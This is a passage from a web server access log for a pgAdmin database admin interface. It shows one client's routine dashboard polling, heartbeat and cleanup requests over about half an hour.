"/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:02:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:03:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:03:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:03:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:04:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:04:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:04:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:06:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:07:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:07:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:08:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:08:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:09:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:09:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:10:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:10:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:11:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:11:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:11:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:12:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:12:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:13:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:13:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:14:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:14:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:15:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:15:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:16:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:16:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:18:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:19:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:20:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:21:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:21:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:25:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:26:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:31:20 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:31:55 +0000] - 200 200 - GET https 